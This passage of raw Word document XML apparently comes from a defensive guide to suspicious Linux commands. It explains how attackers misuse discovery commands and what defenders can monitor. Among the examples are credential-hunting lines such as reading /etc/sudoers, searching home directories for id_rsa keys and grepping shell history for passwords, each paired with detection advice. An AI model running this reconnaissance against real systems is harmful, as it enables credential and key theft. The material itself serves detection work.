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" id="33" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3557778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure: Terminal showing package installation logs (e.g. Ubuntu/Debian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">output). Unexpected installations or package changes (like a hidden miner) could be detected by auditing tools</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="36" w:name="user-group-discovery-commands"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User &amp; Group Discovery Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gathering user information is a key step. While many commands are benign for admins, malicious use often comes from non-privileged or automated contexts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Displays the current user name (effective UID).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers use it to confirm privileges. A normal admin or shell user might run this;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">however, if a service account or webserver process executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, it’s suspicious</w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Audit and alert when</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appears in logs tied to processes that typically don’t need it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows user’s UID, GID and group memberships.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reveals privilege levels. Attackers may run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to see if they have root or sudo rights. Look for this command by unprivileged users or contexts, which might indicate privilege enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">w</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lists currently logged-in users and their processes.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Legitimate system admins use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to monitor sessions. Maliciously, an intruder might check who else is online. Unusual remote users running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(especially from scripting contexts) could trigger alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">last</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Displays login history of users.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows when users last logged in and from where. Attackers may use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">last</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to find recently active accounts or unused accounts to target. In the cryptominer case, the attacker ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">last</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as part of reconnaissance</w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[7]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Logging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">last</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">executions by non-admin users aids detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lists all user accounts on the system.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A basic way to see user names (though no passwords). Routine for system admins. Malicious use: an intruder might scan for default accounts. Defenders should monitor reads of critical files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) especially by non-root users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows sudoer users/groups (who can elevate privileges).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers look here to find where they can run commands as root. Unexpected viewing of this file suggests credential or privilege theft attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find /home -name id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Searches for private SSH keys in home directories.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Malicious: Steal keys to hop to other servers. Defenders should watch for broad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usage, especially if targeting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or other key files. Unexpected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in user homes is a strong indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">history | grep pass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Searches shell history for “pass” (e.g. passwords).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers may try to harvest plaintext passwords from history. Monitoring history reads or usage of pipelines like this can reveal credential harvesting.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="39" w:name="process-network-discovery-commands"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process &amp; Network Discovery Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attackers probe running services and network configuration to map the system and network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lists all running processes in detail.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A staple admin command. However, attackers run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to find security tools (EDR/antivirus) or resource-intensive processes. In the article, using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identified an antimalware process (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/ultrasec/malscan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[8]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Detection: watch for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">combined with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and flag if a non-admin or suspicious account runs it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">top</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
